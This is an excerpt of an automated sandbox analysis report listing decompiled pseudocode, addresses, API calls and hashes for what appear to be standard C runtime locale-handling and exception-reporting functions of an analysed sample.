                                                                                                                                                                          0x00a0eac9
                                                                                                                                                                          0x00a0eae0
                                                                                                                                                                          0x00a0eae0
                                                                                                                                                                          0x00a0eae9
                                                                                                                                                                          0x00a0eaeb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0eaed
                                                                                                                                                                          0x00a0eaf2
                                                                                                                                                                          0x00a0eaf4
                                                                                                                                                                          0x00a0eaf4
                                                                                                                                                                          0x00a0eafa
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0eaff
                                                                                                                                                                          0x00a0eb1d
                                                                                                                                                                          0x00a0eb1f
                                                                                                                                                                          0x00a0eb42
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0eb47
                                                                                                                                                                          0x00a0eb3a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0eb3c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0eb3c
                                                                                                                                                                          0x00a0eb01
                                                                                                                                                                          0x00a0eb09
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0eb0b
                                                                                                                                                                          0x00a0eb0e
                                                                                                                                                                          0x00a0eb14
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0eb16
                                                                                                                                                                          0x00a0eb18
                                                                                                                                                                          0x00a0eb1a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0eb1a
                                                                                                                                                                          0x00a0eacb
                                                                                                                                                                          0x00a0ead3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ead5
                                                                                                                                                                          0x00a0ead8
                                                                                                                                                                          0x00a0eade
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0eade
                                                                                                                                                                          0x00a0eae4
                                                                                                                                                                          0x00a0eae6
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00A0EDB7,00000002,00000000,?,?,?,00A0EDB7,?,00000000), ref: 00A0EB32
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,00A0EDB7,00000002,00000000,?,?,?,00A0EDB7,?,00000000), ref: 00A0EB5B
                                                                                                                                                                          • GetACP.KERNEL32(?,?,00A0EDB7,?,00000000), ref: 00A0EB70
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                          • Opcode ID: e30c190c5c13f9b85fe3ef1570e43ab1e403b22bc4f8b33c6a4305b95ad991e5
                                                                                                                                                                          • Instruction ID: df8d78aa94799833d024d6f35c152bd659ffa9f3fc3bc01624998ecff8a90d7a
                                                                                                                                                                          • Opcode Fuzzy Hash: e30c190c5c13f9b85fe3ef1570e43ab1e403b22bc4f8b33c6a4305b95ad991e5
                                                                                                                                                                          • Instruction Fuzzy Hash: C221B072B00108AADB34CF64F901A97B3A6FB59FA1B56CC64E90BD7284E732DD41E350
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0EC6E Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                          			E00A0EC6E(void* __ecx, void* __edx, void* __eflags, signed short _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				void* _t53;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t64;
				int _t66;
				short* _t70;
				intOrPtr _t73;
				void* _t75;
				short* _t76;
				intOrPtr _t83;
				short* _t86;
				short* _t89;
				short** _t99;
				short* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0xa44bac; // 0x96877b9b
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E00A041D0(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00A041D0(__ecx, __edx);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0xa191a4; // 0x17
					E00A0EC0D(_t89, 0, 0xa19090, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t97;
					if(__eflags == 0) {
						goto L19;
					}
					E00A0E5AF(_t89, _t97, __eflags,  &_v20);
					_pop(_t89);
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0) {
						L8:
						E00A0E695(_t89, _t97, __eflags,  &_v20);
						L9:
						_pop(_t89);
						if(_v20 != 0) {
							_t100 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t101 = E00A0EA99(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
							__eflags = _t101;
							if(_t101 == 0) {
								L22:
								_t53 = 0;
								L23:
								return E009F8F7D(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
							}
							_t55 = IsValidCodePage(_t101 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t101;
							}
							E00A06637(_v16,  &(_v24[0x128]), 0x55, _t100);
							__eflags = _t86;
							if(_t86 == 0) {
								L34:
								_t53 = 1;
								goto L23;
							}
							_t33 =  &(_t86[0x90]); // 0xd0
							E00A06637(_v16, _t33, 0x55, _t100);
							_t64 = GetLocaleInfoW(_v16, 0x1001, _t86, 0x40);
							__eflags = _t64;
							if(_t64 == 0) {
								goto L22;
							}
							_t36 =  &(_t86[0x40]); // 0x30
							_t66 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							_t38 =  &(_t86[0x80]); // 0xb0
							E00A122DE(_t38, _t101, _t38, 0x10, 0xa);
							goto L34;
						}
						_t73 =  *0xa1908c; // 0x41
						_t75 = E00A0EC0D(_t89, _t97, 0xa18d80, _t73 - 1, _v24);
						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0) {
							L14:
							E00A0E695(_t89, _t97, __eflags,  &_v20);
							L15:
							_pop(_t89);
							goto L21;
						}
						_t118 =  *_t76;
						if( *_t76 == 0) {
							goto L14;
						}
						E00A0E5FA(_t89, _t97, _t118,  &_v20);
						goto L15;
					}
					_t114 =  *_t70 - _t97;
					if( *_t70 == _t97) {
						goto L8;
					}
					E00A0E5FA(_t89, _t97, _t114,  &_v20);
					goto L9;
				}
			}





































                                                                                                                                                                          0x00a0ec76
                                                                                                                                                                          0x00a0ec7d
                                                                                                                                                                          0x00a0ec84
                                                                                                                                                                          0x00a0ec88
                                                                                                                                                                          0x00a0ec8c
                                                                                                                                                                          0x00a0ec9a
                                                                                                                                                                          0x00a0ec9f
                                                                                                                                                                          0x00a0eca0
                                                                                                                                                                          0x00a0eca1
                                                                                                                                                                          0x00a0eca2
                                                                                                                                                                          0x00a0ecaa
                                                                                                                                                                          0x00a0ecac
                                                                                                                                                                          0x00a0ecb2
                                                                                                                                                                          0x00a0ecb8
                                                                                                                                                                          0x00a0ecbb
                                                                                                                                                                          0x00a0ecbd
                                                                                                                                                                          0x00a0ecc0
                                                                                                                                                                          0x00a0ecc4
                                                                                                                                                                          0x00a0eccb
                                                                                                                                                                          0x00a0ecd8
                                                                                                                                                                          0x00a0ecdd
                                                                                                                                                                          0x00a0ece0
                                                                                                                                                                          0x00a0ece3
                                                                                                                                                                          0x00a0ece3
                                                                                                                                                                          0x00a0ece5
                                                                                                                                                                          0x00a0ece8
                                                                                                                                                                          0x00a0ecec
                                                                                                                                                                          0x00a0ed5c
                                                                                                                                                                          0x00a0ed5e
                                                                                                                                                                          0x00a0ed60
                                                                                                                                                                          0x00a0ed73
                                                                                                                                                                          0x00a0ed73
                                                                                                                                                                          0x00a0ed7a
                                                                                                                                                                          0x00a0ed80
                                                                                                                                                                          0x00a0ed83
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ed83
                                                                                                                                                                          0x00a0ed62
                                                                                                                                                                          0x00a0ed65
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ed6b
                                                                                                                                                                          0x00a0ed70
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ecf3
                                                                                                                                                                          0x00a0ecf3
                                                                                                                                                                          0x00a0ecf7
                                                                                                                                                                          0x00a0ed09
                                                                                                                                                                          0x00a0ed0d
                                                                                                                                                                          0x00a0ed12
                                                                                                                                                                          0x00a0ed16
                                                                                                                                                                          0x00a0ed17
                                                                                                                                                                          0x00a0ed9f
                                                                                                                                                                          0x00a0ed9f
                                                                                                                                                                          0x00a0eda1
                                                                                                                                                                          0x00a0edad
                                                                                                                                                                          0x00a0edb7
                                                                                                                                                                          0x00a0edbb
                                                                                                                                                                          0x00a0edbd
                                                                                                                                                                          0x00a0ed8e
                                                                                                                                                                          0x00a0ed8e
                                                                                                                                                                          0x00a0ed90
                                                                                                                                                                          0x00a0ed9e
                                                                                                                                                                          0x00a0ed9e
                                                                                                                                                                          0x00a0edc3
                                                                                                                                                                          0x00a0edc9
                                                                                                                                                                          0x00a0edcb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0edd2
                                                                                                                                                                          0x00a0edd8
                                                                                                                                                                          0x00a0edda
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0eddc
                                                                                                                                                                          0x00a0eddf
                                                                                                                                                                          0x00a0ede1
                                                                                                                                                                          0x00a0ede3
                                                                                                                                                                          0x00a0ede3
                                                                                                                                                                          0x00a0edf4
                                                                                                                                                                          0x00a0edf9
                                                                                                                                                                          0x00a0edfb
                                                                                                                                                                          0x00a0ee5b
                                                                                                                                                                          0x00a0ee5d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ee5d
                                                                                                                                                                          0x00a0ee00
                                                                                                                                                                          0x00a0ee0a
                                                                                                                                                                          0x00a0ee1a
                                                                                                                                                                          0x00a0ee20
                                                                                                                                                                          0x00a0ee22
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ee2a
                                                                                                                                                                          0x00a0ee39
                                                                                                                                                                          0x00a0ee3f
                                                                                                                                                                          0x00a0ee41
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ee4b
                                                                                                                                                                          0x00a0ee53
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ee58
                                                                                                                                                                          0x00a0ed1d
                                                                                                                                                                          0x00a0ed2c
                                                                                                                                                                          0x00a0ed31
                                                                                                                                                                          0x00a0ed36
                                                                                                                                                                          0x00a0ed86
                                                                                                                                                                          0x00a0ed86
                                                                                                                                                                          0x00a0ed86
                                                                                                                                                                          0x00a0ed88
                                                                                                                                                                          0x00a0ed8c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ed8c
                                                                                                                                                                          0x00a0ed38
                                                                                                                                                                          0x00a0ed3a
                                                                                                                                                                          0x00a0ed3e
                                                                                                                                                                          0x00a0ed50
                                                                                                                                                                          0x00a0ed54
                                                                                                                                                                          0x00a0ed59
                                                                                                                                                                          0x00a0ed59
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ed59
                                                                                                                                                                          0x00a0ed40
                                                                                                                                                                          0x00a0ed43
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ed49
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ed49
                                                                                                                                                                          0x00a0ecf9
                                                                                                                                                                          0x00a0ecfc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ed02
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ed02

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A041D0: GetLastError.KERNEL32(?,00000000,?,009FD25E,00000000,00000000,?,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A041D5
                                                                                                                                                                            • Part of subcall function 00A041D0: SetLastError.KERNEL32(00000000,00000002,000000FF,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A04273
                                                                                                                                                                            • Part of subcall function 00A041D0: _free.LIBCMT ref: 00A04232
                                                                                                                                                                            • Part of subcall function 00A041D0: _free.LIBCMT ref: 00A04268
                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00A0ED7A
                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00A0EDC3
                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00A0EDD2
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00A0EE1A
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00A0EE39
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 949163717-0
                                                                                                                                                                          • Opcode ID: 082a21b86e808cb8744883ab3783d9adf3833b9c6c81cbcef30dc333aad06c9a
                                                                                                                                                                          • Instruction ID: e630ec49708b78d8b53e75d572ff393d14777c61f242661428ff8d60e04dc888
                                                                                                                                                                          • Opcode Fuzzy Hash: 082a21b86e808cb8744883ab3783d9adf3833b9c6c81cbcef30dc333aad06c9a
                                                                                                                                                                          • Instruction Fuzzy Hash: F2517E72A0020DABEB10EFA5ED45ABE77B8FF48700F044929E915EB1D0E7719944EB61
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009F91A4 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                          			E009F91A4(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E009F9369(_t34);
				 *_t60 = 0x2cc;
				_v632 = E009FA270(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E009FA270(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E009F9369(_t49);
				}
				return _t49;
			}


































                                                                                                                                                                          0x009f91a4
                                                                                                                                                                          0x009f91a4
                                                                                                                                                                          0x009f91a4
                                                                                                                                                                          0x009f91b8
                                                                                                                                                                          0x009f91ba
                                                                                                                                                                          0x009f91bd
                                                                                                                                                                          0x009f91bd
                                                                                                                                                                          0x009f91c1
                                                                                                                                                                          0x009f91c6
                                                                                                                                                                          0x009f91de
                                                                                                                                                                          0x009f91e4
                                                                                                                                                                          0x009f91ea
                                                                                                                                                                          0x009f91f0
                                                                                                                                                                          0x009f91f6
                                                                                                                                                                          0x009f91fc
                                                                                                                                                                          0x009f9202
                                                                                                                                                                          0x009f9209
                                                                                                                                                                          0x009f9210
                                                                                                                                                                          0x009f9217
                                                                                                                                                                          0x009f921e
                                                                                                                                                                          0x009f9225
                                                                                                                                                                          0x009f922c
                                                                                                                                                                          0x009f922d
                                                                                                                                                                          0x009f9236
                                                                                                                                                                          0x009f923c
                                                                                                                                                                          0x009f923f
                                                                                                                                                                          0x009f9245
                                                                                                                                                                          0x009f9254
                                                                                                                                                                          0x009f9260
                                                                                                                                                                          0x009f926b
                                                                                                                                                                          0x009f9272
                                                                                                                                                                          0x009f9279
                                                                                                                                                                          0x009f9284
                                                                                                                                                                          0x009f928c
                                                                                                                                                                          0x009f9295
                                                                                                                                                                          0x009f9297
                                                                                                                                                                          0x009f929a
                                                                                                                                                                          0x009f929c
                                                                                                                                                                          0x009f92a6
                                                                                                                                                                          0x009f92ae
                                                                                                                                                                          0x009f92b4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f92bb
                                                                                                                                                                          0x009f92be

                                                                                                                                                                          APIs
                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 009F91B0
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 009F927C
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009F929C
                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 009F92A6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                          • Opcode ID: f68a7fb52ce48bb9eab51e69ae65aa9761373c69adafe1195b2752a9cf95f2ad
                                                                                                                                                                          • Instruction ID: 14d008a14d2f993a99237fc014c48ea5f2b087ede4bbb45653df20dfa51124c9
                                                                                                                                                                          • Opcode Fuzzy Hash: f68a7fb52ce48bb9eab51e69ae65aa9761373c69adafe1195b2752a9cf95f2ad
                                                                                                                                                                          • Instruction Fuzzy Hash: B43127B5D0521C9BDF10EFA5D989BCDBBB8AF08300F1040AAE50DAB250EB755A858F45
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0E720 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                          			E00A0E720(void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t50;
				int _t56;
				signed int _t58;
				void* _t74;
				signed int _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t89;
				signed int _t90;
				signed int _t92;
				intOrPtr _t93;
				void* _t94;
				signed int _t111;
				signed int _t115;
				intOrPtr* _t117;
				intOrPtr* _t122;
				signed int* _t124;
				int _t126;
				signed int _t127;
				void* _t128;
				void* _t141;

				_t121 = __edx;
				_t50 =  *0xa44bac; // 0x96877b9b
				_v8 = _t50 ^ _t127;
				_t94 = E00A041D0(__ecx, __edx);
				_t124 =  *(E00A041D0(__ecx, __edx) + 0x34c);
				_t126 = E00A0EA48(_a4);
				asm("sbb ecx, ecx");
				_t56 = GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
				_v252 = _v252 & 0x00000000;
				if(_t56 == 0) {
					L37:
					 *_t124 = 0;
					_t58 = 1;
					__eflags = 1;
					L38:
					return E009F8F7D(_t58, _t94, _v8 ^ _t127, _t121, _t124, _t126);
				}
				if(E00A0B1C4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x54)),  &_v248) != 0) {
					L16:
					if(( *_t124 & 0x00000300) == 0x300) {
						L36:
						_t58 =  !( *_t124 >> 2) & 0x00000001;
						goto L38;
					}
					asm("sbb eax, eax");
					if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
						goto L37;
					}
					_t74 = E00A0B1C4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
					if(_t74 != 0) {
						__eflags =  *(_t94 + 0x60);
						if( *(_t94 + 0x60) != 0) {
							goto L36;
						}
						__eflags =  *(_t94 + 0x5c);
						if( *(_t94 + 0x5c) == 0) {
							goto L36;
						}
						__eflags = E00A0B1C4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
						if(__eflags != 0) {
							goto L36;
						}
						_push(_t124);
						_t94 = 0;
						_t78 = E00A0EB9F(__eflags, _t126, 0);
						__eflags = _t78;
						if(_t78 == 0) {
							goto L36;
						}
						 *_t124 =  *_t124 | 0x00000100;
						__eflags = _t124[1];
						L34:
						if(_t141 == 0) {
							_t124[1] = _t126;
						}
						goto L36;
					}
					_t111 =  *_t124 | 0x00000200;
					 *_t124 = _t111;
					if( *(_t94 + 0x60) == _t74) {
						__eflags =  *(_t94 + 0x5c) - _t74;
						if( *(_t94 + 0x5c) == _t74) {
							goto L20;
						}
						_t122 =  *((intOrPtr*)(_t94 + 0x50));
						_v256 = _t122 + 2;
						do {
							_t80 =  *_t122;
							_t122 = _t122 + 2;
							__eflags = _t80 - _v252;
						} while (_t80 != _v252);
						_t121 = _t122 - _v256 >> 1;
						__eflags = _t122 - _v256 >> 1 -  *(_t94 + 0x5c);
						if(__eflags != 0) {
							_t74 = 0;
							goto L20;
						}
						_push(_t124);
						_t81 = E00A0EB9F(__eflags, _t126, 1);
						__eflags = _t81;
						if(_t81 == 0) {
							goto L36;
						}
						 *_t124 =  *_t124 | 0x00000100;
						_t74 = 0;
						L21:
						_t141 = _t124[1] - _t74;
						goto L34;
					}
					L20:
					 *_t124 = _t111 | 0x00000100;
					goto L21;
				}
				asm("sbb eax, eax");
				if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
					goto L37;
				}
				_t89 = E00A0B1C4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
				_t115 =  *_t124;
				if(_t89 != 0) {
					__eflags = _t115 & 0x00000002;
					if((_t115 & 0x00000002) != 0) {
						goto L16;
					}
					__eflags =  *(_t94 + 0x5c);
					if( *(_t94 + 0x5c) == 0) {
						L12:
						_t121 =  *_t124;
						__eflags = _t121 & 0x00000001;
						if((_t121 & 0x00000001) != 0) {
							goto L16;
						}
						_t90 = E00A0EB7A(_t126);
						__eflags = _t90;
						if(_t90 == 0) {
							goto L16;
						}
						_t121 = _t121 | 0x00000001;
						__eflags = _t121;
						 *_t124 = _t121;
						goto L15;
					}
					_t92 = E00A12360(_t94, _t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248,  *(_t94 + 0x5c));
					_t128 = _t128 + 0xc;
					__eflags = _t92;
					if(_t92 != 0) {
						goto L12;
					}
					 *_t124 =  *_t124 | 0x00000002;
					__eflags =  *_t124;
					_t124[2] = _t126;
					_t117 =  *((intOrPtr*)(_t94 + 0x50));
					_t121 = _t117 + 2;
					do {
						_t93 =  *_t117;
						_t117 = _t117 + 2;
						__eflags = _t93 - _v252;
					} while (_t93 != _v252);
					__eflags = _t117 - _t121 >> 1 -  *(_t94 + 0x5c);
					if(_t117 - _t121 >> 1 ==  *(_t94 + 0x5c)) {
						_t124[1] = _t126;
					}
				} else {
					_t124[1] = _t126;
					 *_t124 = _t115 | 0x00000304;
					L15:
					_t124[2] = _t126;
				}
			}
































                                                                                                                                                                          0x00a0e720
                                                                                                                                                                          0x00a0e72b
                                                                                                                                                                          0x00a0e732
                                                                                                                                                                          0x00a0e740
                                                                                                                                                                          0x00a0e748
                                                                                                                                                                          0x00a0e757
                                                                                                                                                                          0x00a0e763
                                                                                                                                                                          0x00a0e774
                                                                                                                                                                          0x00a0e77a
                                                                                                                                                                          0x00a0e783
                                                                                                                                                                          0x00a0e95d
                                                                                                                                                                          0x00a0e95f
                                                                                                                                                                          0x00a0e961
                                                                                                                                                                          0x00a0e961
                                                                                                                                                                          0x00a0e962
                                                                                                                                                                          0x00a0e970
                                                                                                                                                                          0x00a0e970
                                                                                                                                                                          0x00a0e79c
                                                                                                                                                                          0x00a0e857
                                                                                                                                                                          0x00a0e862
                                                                                                                                                                          0x00a0e951
                                                                                                                                                                          0x00a0e958
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e958
                                                                                                                                                                          0x00a0e876
                                                                                                                                                                          0x00a0e88c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
